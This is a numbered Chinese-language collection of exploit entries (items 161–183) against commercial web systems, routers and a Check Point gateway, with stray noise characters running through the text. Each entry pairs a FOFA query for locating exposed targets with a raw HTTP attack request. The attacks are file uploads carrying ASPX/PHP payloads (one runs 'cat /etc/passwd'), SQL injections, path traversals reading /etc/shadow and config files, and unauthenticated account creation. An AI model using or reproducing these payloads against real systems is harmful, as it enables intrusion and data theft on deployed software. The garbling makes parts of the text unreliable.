. n; H* N# _2 l% r2 h
9 T4 P: `5 U5 o. J! J
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传# E* \% K$ Z% @: I. ]& t8 [
FOFA:body="/KT_Css/qd_defaul.css"0 c6 Q" o4 u3 C& ]) ^& V# _0 c* N
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
+ c" A' U# P2 ?/ |% hPOST /Webservice.asmx HTTP/1.1
: [$ x- I! z% Y. t4 {* mHost: x.x.x.x
+ u3 Z. ~. U: V  ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 _. }0 ~7 Q) ~
Connection: close0 u0 }/ Y. h! u+ v! Z
Content-Length: 445; f* T2 Y/ _/ g+ b2 s& e9 ^
Content-Type: text/xml
2 F* w( Y! u: ]% ~' Z& M6 GAccept-Encoding: gzip3 g& F8 I5 m+ a

) Y8 b; c! K' d4 i* f8 y% w$ N# N<?xml version="1.0" encoding="utf-8"?>( n7 R! w, Y% s9 `- Z
<soap:Envelope xmlns:xsi="' C) G" i  n5 }# ?8 Z+ \% j7 v; Y
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
( ?4 ?9 w6 g' W; T; Q& wxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% m% Y1 v+ b+ T( I  A<soap:Body>2 j% u! S' p" n- Z+ f8 k1 B( Q
<UploadResume xmlns="http://tempuri.org/">( W1 N: Y" d8 I% u  Q) b
<ip>1</ip>
+ S0 A! g" b/ f$ V" h6 H, i0 j0 M- n<fileName>../../../../dizxdell.aspx</fileName>
! M! l% w, A- M- Y0 L8 r: ^" |<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>% Z. }+ Z" p% X. ^
<tag>3</tag>
% Z: L1 h/ ~& a. Y  M" N</UploadResume>; R+ g# w. m5 U& t9 p9 C3 l
</soap:Body>
6 n3 G9 @, M- y( I2 {3 M5 i# D</soap:Envelope>" l2 r. V6 i" ~) k8 g1 L

/ ?& U9 X- e% L# p7 o0 \+ O4 y1 B5 @
http://x.x.x.x/dizxdell.aspx3 X: m9 |" J) d2 V1 ^& L4 j
5 G% B* n& p( D; i5 p" r% e
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
6 L2 d" S2 x: e7 JFOFA: app="和丰山海-数字标牌", }1 |9 }) C/ t1 P( @1 t
POST /QH.aspx HTTP/1.1& R" a8 s6 k' w  C5 L
Host: x.x.x.x
" Z# e+ q, d$ |% ^8 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
& P1 u2 U" R( y2 TConnection: close
5 {0 P2 W1 s0 K6 Q9 U: YContent-Length: 583
4 U9 |. O+ {; Q) a% P) s/ z- z0 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey+ t$ P- {: v  f/ Y7 i* X  c0 H
Accept-Encoding: gzip
5 |5 z& `) Z7 N0 V  }: w* Q8 M- D) g
------WebKitFormBoundaryeegvclmyurlotuey
1 f& {6 N, j# o  g( EContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
; G7 Z1 C8 |; G+ z  I) ~$ ?( ^: zContent-Type: application/octet-stream3 y" F, k1 {3 t; M# p  ~- I

. _1 }0 B4 o1 F: Y* \1 x8 I* |<% response.write("ujidwqfuuqjalgkvrpqy") %>6 V+ v: m. Y7 P+ r1 \
------WebKitFormBoundaryeegvclmyurlotuey/ M' h3 w  a) i2 f" ?+ T
Content-Disposition: form-data; name="action"
, V8 }/ W) r7 V* C+ f
1 ?% F. {) [% P2 n! Kupload' B! }+ X+ |4 o) g! D( N
------WebKitFormBoundaryeegvclmyurlotuey
) W% w) B% {  p- i8 h8 C% _Content-Disposition: form-data; name="responderId"; b1 M7 T+ p, _# O# u1 K4 O

8 t9 @+ K- j+ m8 T* ~" c$ cResourceNewResponder: [% L( g& B* V* b+ F6 T
------WebKitFormBoundaryeegvclmyurlotuey
. i1 @* g/ ^8 g5 v' R* f& tContent-Disposition: form-data; name="remotePath"4 u4 N4 I( a! M: n, R' y! i
4 l& j" Q1 u8 S% v+ k  _: V
/opt/resources. B/ S) ?  T) B& L0 q2 u% ^
------WebKitFormBoundaryeegvclmyurlotuey--
, v" {+ C/ [* L, @7 Q+ |7 |% l) P! X. v6 a# x

. J  i. ]4 ]3 p8 zhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
2 f  [/ `' i, E$ I) Y
! [' B* [# S# \! R163. 号卡极团分销管理系统 ue_serve.php 任意文件上传- V& T3 Y5 ^' ?! K/ `5 Z
FOFA: icon_hash="-795291075"
( M1 Y( n+ ~" L5 l7 P+ v# vPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
0 X( ^6 h8 D5 g: M  `3 Q- EHost: x.x.x.x' T) V+ x& ]# J, B0 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
1 T. s' y* N* G+ U- `5 _Connection: close) g0 _& h! [2 s
Content-Length: 293
# N  o; F8 @4 j  l  z4 H5 nAccept: */*
; _6 H( h+ `( y1 v& K, hAccept-Encoding: gzip, deflate% B, R0 Q, [8 w8 }2 S. H
Accept-Language: zh-CN,zh;q=0.9
" ?* D, h$ {8 ~0 `2 D$ yContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
1 A5 {! n7 F, [& _9 ~- l8 i
0 V- u+ m/ ^* j3 J4 V7 H------iiqvnofupvhdyrcoqyuujyetjvqgocod
& q& Y& s1 Z. d7 O* U+ ZContent-Disposition: form-data; name="name"( p9 K1 u/ `0 |1 x- N2 z

0 u  _8 y, y* j4 m  Q- G* ^1.php
2 c( t9 v' n6 N) L+ ]  N------iiqvnofupvhdyrcoqyuujyetjvqgocod) `/ R1 D$ f. @4 H
Content-Disposition: form-data; name="upfile"; filename="1.php"
8 t7 c8 {( y# ^+ H( TContent-Type: image/jpeg( ]7 p$ ~5 T: R! }+ @
$ [$ Q1 v  a" I% \. n
rvjhvbhwwuooyiioxega" ~2 A5 o1 o9 ~9 g1 i
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
& o: g( l( j* q$ V- |( p+ \& r( ~9 t) ^" h

! }0 W8 [9 I' R$ I. s" W8 i# l164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
: P. s+ A6 V  I4 ^' wFOFA: title="智慧综合管理平台登入"
- p; S- ^6 b: Z5 O9 l% sPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
! @: W7 {* x$ w/ I6 N' D6 N( p5 HHost: x.x.x.x
: H9 Q6 g) n1 x! ^( w; L6 o. M# EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.07 {7 P/ {1 b# D9 q) q$ B
Content-Length: 288  m9 o7 r9 B- M% M5 J2 m
Accept: application/json, text/javascript, */*; q=0.01
4 A( A+ t3 c8 }& sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,6 R7 n: v" y3 D% O! v
Connection: close7 h! Y+ I" s  W- H- P* i
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl  e, j6 E+ Y  n  S' g
X-Requested-With: XMLHttpRequest
6 Y1 L0 d6 L9 XAccept-Encoding: gzip* v0 E8 c1 [6 j$ U
- f; o1 M* Y; x
------dqdaieopnozbkapjacdbdthlvtlyl* h" [* x, g) z) D. I
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"9 }0 I4 \3 N% K+ J3 u( ^
Content-Type: image/jpeg( Y) A: L. h6 K0 s/ E7 L3 j7 a) @; h
* I2 N9 V) h& P6 m9 j6 ^: d# r4 }0 Z
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
  V& q6 K; F- [2 s------dqdaieopnozbkapjacdbdthlvtlyl--
! \! g) b; K: U3 P# b1 L) P6 r  o) I: V4 P' f6 |: ?& u

0 F7 ~- ]# \. r' N2 ~& ]  Yhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
: m& b, R% t, B: D  K
6 l" c$ B4 ~% g/ z7 ]165. OrangeHRM 3.3.3 SQL 注入
0 e6 ]. K* {; V2 z( X! V" MCVE-2024-36428
* H2 D! v" D( OFOFA: app="OrangeHRM-产品"
4 K6 W, p% e8 y' d1 E6 EURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))& C; ^( l# J8 R1 Q* E

$ j' x3 [; x6 A" q8 D
# V9 N- G  o% B% E: K; y166. 中成科信票务管理平台SeatMapHandler SQL注入
' W9 u8 \# s6 x- o5 C( _FOFA:body="技术支持:北京中成科信科技发展有限公司") i  P0 p2 P3 L  z/ A
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1' O, C5 |* M4 J5 @' k
Host:" {) K. @; h" K* e
Pragma: no-cache  {5 f$ C3 }; V* J
Cache-Control: no-cache- j! W. }' x% \
Upgrade-Insecure-Requests: 15 A2 G" K6 K. v3 ?$ b  z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
7 v4 ]  B/ U/ D2 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; b/ W3 F5 t+ }0 \; E/ ?) e" r6 n
Accept-Encoding: gzip, deflate) V- E, `$ M2 I& m+ L2 L) C2 g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; L  }+ m- B' g8 O
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
' F3 W5 b+ V6 F1 f4 W& e" sConnection: close1 y% C8 u  l, i# s) ]1 P3 I9 l9 P& X
Content-Type: application/x-www-form-urlencoded
# \) G5 Z8 c# NContent-Length: 89: ?) [1 i# l( Z- k
# ?" u, K) b) ^6 w* N$ F& ]' A
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
' q5 \- w$ e+ U% @  L( ~1 n, F4 F
" T7 c. r* J+ l+ G- Y
167. 精益价值管理系统 DownLoad.aspx任意文件读取* z: p% y5 b0 A3 m( b: R6 ^8 O6 C
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"( A; C0 @9 ~! y8 M8 S9 l0 ?
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.16 ]* |- R+ Z  v  W3 _) w! S
Host:& P5 `) V( X. _' m/ F1 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 L4 J, v1 @2 ~7 a. C
Content-Type: application/x-www-form-urlencoded
  s$ Z1 U. r8 Y9 A6 [1 I& d( v/ SAccept-Encoding: gzip, deflate9 u& F$ X4 y- k) ?- h
Accept: */*
7 N, }; T- o) p1 i0 U  a- u1 wConnection: keep-alive
: `0 ^6 D( s$ c& f9 F6 ?/ v" ^% h% r) z* X, V& h$ Y& V: f
7 y$ j9 i, Z% _$ X5 u- |/ a* m
168. 宏景EHR OutputCode 任意文件读取
4 g2 A' L8 b- \9 t% d( A) {- wFOFA:app="HJSOFT-HCM"0 B5 n6 D9 l( W! |
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
* ^: j; \& y, _- A# I' lHost: your-ip* Y& A  v0 F1 a1 T( K" u; @3 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
# v) k: C3 o: H0 Y; h5 ?Content-Type: application/x-www-form-urlencoded7 H. A  f3 I; m* n3 c
Connection: close+ o: j6 ]. u+ D1 ^; m

) W# b. I  o+ D! N2 ^) X' p
2 c9 H, x( O( r2 M
0 f) S! J/ _6 s% _6 y: S& k169. 宏景EHR downlawbase SQL注入- {. P) p( {( |7 `9 _
FOFA:app="HJSOFT-HCM"! E% G; o; f; @+ S+ X/ ^
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
5 |5 i5 S) A/ z) v+ u+ @' I# SHost: your-ip4 T( D5 ^& t/ C+ G6 o. w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 Q; N  y  E3 x8 u+ HAccept: */*, J; M7 S9 `2 A
Accept-Encoding: gzip, deflate
8 z! m% \  V0 a  U+ x6 oConnection: close8 _; }" F. S- I

7 w, W8 D: n' b7 ?4 ?; N1 b1 G7 V4 w8 \! q: [

6 V; s7 x8 e# `4 Y4 e2 {/ g170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 ~( e7 [+ o; @
FOFA:body="/general/sys/hjaxmanage.js"
' d( l( C. X5 a0 z, UPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1. C/ U* Z. a; Q7 Z
Host: balalanengliang
7 z- }& {9 P) c: X: D3 f$ w& xUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* n; s- w. {1 d# ^Content-Type: application/x-www-form-urlencoded- f8 _$ m9 J# o* N1 \

8 y. {4 [- b* y# p' Y) wfilename=../webapps/ROOT/WEB-INF/web.xml
( s. q; s% c8 x9 e/ n# f2 p7 M: x9 S# @

* I3 |+ ?% p2 O$ S/ [. X3 _5 ]171. 通天星CMSV6车载定位监控平台 SQL注入
! u+ b, ?6 \, u5 a& L8 XFOFA:body="/808gps/"
: f+ N8 c3 Y7 \$ G, h1 I4 K: B. E# ?; iGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
: \) Y+ Y% y$ Z8 H8 h, }Host: your-ip
3 {1 z. g  j( A0 L, e8 E9 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0" l. b! @* C9 o9 ^
Accept: */*! q  _; N2 Y6 O. t2 j% n) t7 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 S9 u* p' Z+ N# A. b/ v- O5 EAccept-Encoding: gzip, deflate/ z; Y1 X7 i  j4 _. ^; m# n
Connection: close
- }: s1 t' z, s9 q, D+ E/ |- a# p7 x& m5 n/ y, M2 T1 |

! q! ?+ q" y8 I0 Z* {# u9 O9 z' b2 p
172. DT-高清车牌识别摄像机任意文件读取
8 F( C( [* c9 F  b% LFOFA:app="DT-高清车牌识别摄像机"
5 c- n0 l' g# Q: `GET /../../../../etc/passwd HTTP/1.1
  L6 B  t1 l' ]+ E+ kHost: your-ip. L* ^& P8 Z( Y( d* N2 e5 F& \6 ^& Z+ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 P/ x& f8 ^% H4 m% E& _/ ^4 d5 rAccept-Encoding: gzip, deflate
7 M6 E/ O/ ]9 w" S7 cAccept: */*
. E  e0 H3 n  I: d7 I9 k1 e8 ZConnection: keep-alive
1 |+ x' A) f4 s# Q3 o# f: X& T  [" |& g1 l; p% Y! }# A
  E# J. d5 b) h3 N, L, m# z; k9 d

% b% |: B  n6 r8 g8 G173. Check Point 安全网关任意文件读取' E0 t; {5 P" Y* N: C5 e; t+ y  h9 |) W
CVE-2024-24919
# x5 _( {: ]3 tFOFA:app="Check_Point-SSL-Network-Extender"% }. N: Y3 V$ g/ }
POST /clients/MyCRL HTTP/1.1
! Y* K9 T2 B  k# k9 }, P( UHost: your-ip
2 ], T4 ]; e$ T; MContent-Type: application/x-www-form-urlencoded3 b( \* D9 c; T: S+ i, v/ a
4 V$ }; y' p; N/ e
aCSHELL/../../../../../../../etc/shadow
) r* g, @* S% _* k$ x. p- k. C- P9 C7 s; p* |& f- ]( K$ G9 x

/ W/ b9 W2 u& `  M, N! R3 ]
( F1 r0 c' y' D! m0 \# w# _$ O0 P. A174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 H7 k/ r2 C3 M4 |  J5 b' [FOFA:app="金和网络-金和OA". d' n) i% `$ J) c+ v8 m( X
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
3 F3 a7 l* T. W' m1 a! d8 CHost: your-ip
7 V0 d" n( J/ Y) B( d' zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ `  R1 F3 B* p/ r' mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, u0 I) B$ K' h7 x7 O) A. Z4 `7 JAccept-Encoding: gzip, deflate, br
" J/ `) w) T; OAccept-Language: zh-CN,zh;q=0.9
- A" |9 s5 P1 YConnection: close* N- z& {$ m! E2 L& L0 O" N
; U0 k; ]2 s4 @  Y* S, b7 `
, k, O  ?- A" j% w+ j! k/ \
/ o$ W. ~  a) O& \
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入7 y, `# i; t; x. Q1 Z: Z/ M$ S
FOFA:app="金和网络-金和OA": i: [& \1 k4 D% ~
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.14 f9 |! |* A2 m9 \4 I
Host:
6 W7 ^3 r! {" ZUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ I  O6 _; c4 _, o( c8 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& D0 X4 i3 c+ v1 Z6 H" F  U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ _4 F9 m  {& F7 R! Y2 U! z" SAccept-Encoding: gzip, deflate5 {* ]: }9 ^0 ]5 K
Connection: close
. E3 w8 Q2 j; b7 MUpgrade-Insecure-Requests: 1
$ T' Z$ W# d8 `" H. x- @& H4 i
9 Q3 \7 m/ m5 ]7 X4 F' e" v2 q: Z) \4 w0 d8 m0 z
176. 电信网关配置管理系统 rewrite.php 文件上传% [4 T! S/ V3 Y; @. ~$ ?
FOFA:body="img/login_bg3.png" && body="系统登录"! K1 ~: K$ U4 d; q
POST /manager/teletext/material/rewrite.php HTTP/1.11 E& R, N& l6 x
Host: your-ip
+ m9 k) H$ g8 X5 H4 `" W; dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0. @& P- q- u) |7 I4 j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT0 U( ~9 D& @9 |" h. K
Connection: close
% R3 |: f* t0 s: `9 e2 s* `4 }+ R: V  E- d6 G8 x
------WebKitFormBoundaryOKldnDPT
+ N) @' m; f% p) pContent-Disposition: form-data; name="tmp_name"; filename="test.php"1 O. q- Y" H7 h2 I0 R6 N" ?
Content-Type: image/png6 o/ {3 R% y7 a7 P

  A7 D1 H" j3 l. F0 G( @) X<?php system("cat /etc/passwd");unlink(__FILE__);?>
* X# X/ ?/ m- E# }! w------WebKitFormBoundaryOKldnDPT- V, G7 [% g" W" O- e
Content-Disposition: form-data; name="uploadtime"/ d7 ^) @. @* l0 i$ d' M( c" C

3 L8 n& b# Z# ]8 v* y8 @: Q " i0 j8 F( `0 L' h" w8 X
------WebKitFormBoundaryOKldnDPT--7 ?# w2 s& v' Y
% q+ P4 ]* z/ D' t: O$ q" @6 k2 V3 i4 T

# O/ S2 V, \" b- w7 ]3 H$ Q4 i% Y1 a$ |& S* K
177. H3C路由器敏感信息泄露
* z; E. M- @+ C/ u% u; L+ i9 e% p/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
: ^5 M5 @; U( q# [' ^/userLogin.asp/../actionpolicy_status/../M60.cfg* i8 ~6 y3 b% e/ s( o" C
/userLogin.asp/../actionpolicy_status/../GR8300.cfg) e& H- w/ W% H0 j
/userLogin.asp/../actionpolicy_status/../GR5200.cfg- \% u5 j) N3 O  J. p7 E, c
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
8 V1 e; r( Z' ?2 ]/userLogin.asp/../actionpolicy_status/../GR2200.cfg: J( E- g& k. X
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg7 V1 F- d5 @3 R
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
9 `) r5 ]9 {) L1 v( T1 T/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg+ z$ ]+ ]0 f; ~4 J1 f1 |: t. n
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
% Z. H. ]* H" c  S/ k2 l: z1 G8 L. |/userLogin.asp/../actionpolicy_status/../ER5200.cfg* N! J& s- X+ y6 Q) |
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
; t$ o" T6 U; ~- ~' U/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/ d) u$ @; @6 I1 i3 Y; y% K: d/userLogin.asp/../actionpolicy_status/../ER3260.cfg
4 G: J  x# e7 K/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg; k% J. _; E- z0 N4 d
/userLogin.asp/../actionpolicy_status/../ER3200.cfg! |8 I% V7 O5 K8 F9 @
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
4 _) d8 V" V$ l/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
, ]5 e: J1 P  K, L$ m/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg+ f9 n, A/ L$ j1 r# }  Y4 g  r) @
/userLogin.asp/../actionpolicy_status/../ER3100.cfg3 }6 Z# b- o# r4 ]' o- o$ Q
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
# g. M5 g3 D/ w( R" Z" f% \4 m$ {+ K; S8 V

6 `7 J3 `. V: F+ b; d3 p6 ?178. H3C校园网自助服务系统-flexfileupload-任意文件上传
7 G- d9 ^4 o- a  pFOFA:header="/selfservice"
* y+ j1 A7 t: U% O% n& S/ SPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
5 k+ b4 [7 k- D$ b' ]. d: yHost:
) b7 W! R& X! _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& E2 S. s- W, i9 ~
Content-Length: 252: G1 i5 l" A! I! v! c, o. f/ ~7 ^
Accept-Encoding: gzip, deflate  |1 H$ P1 p7 M$ \1 t
Connection: close/ l5 {3 ~* r5 A4 F( ]
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
: L+ E7 v1 z4 K6 k) d7 A; B-----------------aqutkea7vvanpqy3rh2l
( }- |( }2 A" J, kContent-Disposition: form-data; name="12234.txt"; filename="12234"
( X- J0 |& u/ y. x5 KContent-Type: application/octet-stream6 n: R) v6 ^) |. A" x' P
Content-Length: 255
: W' q- z4 A  A. l% x6 m
1 `6 \6 P& \3 N; P122341 a1 L+ y( U4 J% t, f
-----------------aqutkea7vvanpqy3rh2l--$ I3 E2 b7 y, G% j8 Q
  g5 Z) g8 E# v. ]' |

; P- |; t( z# m* TGET /imc/primepush/%2e%2e/flex/12234.txt; {9 X3 T) |5 Y9 {) I

( V: g  W8 y( @8 c$ E4 H6 [3 `* b6 F3 V: c7 e& P% z
179. 建文工程管理系统存在任意文件读取% z. z, a9 K; T
POST /Common/DownLoad2.aspx HTTP/1.1
' C. l  a" F# j. ^# a3 C! z4 gHost: {{Hostname}}% s! A4 e. G0 l% R" u1 a, B
Content-Type: application/x-www-form-urlencoded
! j  r1 u) k% c8 i  L& jUser-Agent: Mozilla/5.0! v% N0 P; h* S$ b7 v# `

, C7 M& ?6 L- A: p" \path=../log4net.config&Name=; K5 w2 L* x% ^- [9 ?

  v4 T7 W4 j. o- J+ Z
8 |# Z5 q" ^( i! W% [180. 帮管客 CRM jiliyu SQL注入# r# y/ _0 J6 b* I! L" [
FOFA:app="帮管客-CRM"& n& x, h" [  i$ D5 t
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1/ Q8 ]5 ^8 p' W8 `% \
Host: your-ip* Q% B0 q" Y3 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 P$ ^: q2 W  ~! c) q7 N2 w# X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: {0 @4 k' a6 _& h8 {' O
Accept-Encoding: gzip, deflate
$ O6 O0 E% m: ^3 j# mAccept-Language: zh-CN,zh;q=0.9
3 e3 M* |& F6 \1 dConnection: close
$ p4 u4 D* P6 ?5 I) F! a# Q; j, G4 P- @* h2 ~& Z+ ^  v
& `2 t0 t! M" q& F. E
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
& B7 d4 s" b, f2 a/ _( sFOFA:"PDCA/js/_publicCom.js"
$ W& T1 U* a- N2 A  \POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.16 c- P0 K& [' b
Host: your-ip
# v- x3 M# S+ q* H# z% ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. T0 y# u6 [- j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) E4 q! G( Z, WAccept-Encoding: gzip, deflate, br% ?; c0 c7 S& x5 ~( d9 Z- E: S' d
Accept-Language: zh-CN,zh;q=0.9
2 w9 I  i$ _  T. x# k) a+ RConnection: close4 N# ~3 \% F7 X0 U+ t/ n
Content-Type: application/x-www-form-urlencoded
! i  S2 p9 ?9 w% j) o4 l3 z7 N' `: _4 @8 b
- o8 G' e  X1 Q, q3 j/ p
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20- o: P# x: h1 M+ m' g+ [$ e
' ]. T# c- p, L% s8 S' O. H: q

0 W5 I; F7 e2 \: b182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
) G* {0 W1 Z0 l9 c; P: z) m8 `FOFA:"PDCA/js/_publicCom.js"
# C' U5 x! }: r. S4 iPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1! N3 ?9 l0 g* V2 p' _
Host: your-ip9 {8 _5 ^: ~& A# M  l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
( m8 b, o' k9 q& ~" S; {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Y& E* B8 T/ `9 {% W, Q2 K& t9 Z" wAccept-Encoding: gzip, deflate, br' T" d2 `9 P5 c! F( d0 H
Accept-Language: zh-CN,zh;q=0.9
6 y7 n3 \7 I+ p4 u) gConnection: close
8 C/ s7 z8 X$ xContent-Type: application/x-www-form-urlencoded
, L( b5 |8 m9 A- t3 a. H5 E4 u6 G
% ?1 P& ~7 {1 k. P8 N' K0 j3 J$ `2 @* t% q
username=test1234&pwd=test1234&savedays=1
# r. F) M+ a! @1 i% J% N# h: T% s5 D# ^
& s/ j% B) d' h5 M; Z
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
6 t. _4 L. s  G- @. UFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
7 [3 A' m4 {! d1 ]GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1' p0 f: h0 A( T, b9 A" [7 P
Host: your-ip
+ _0 l( x! b: {, XUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
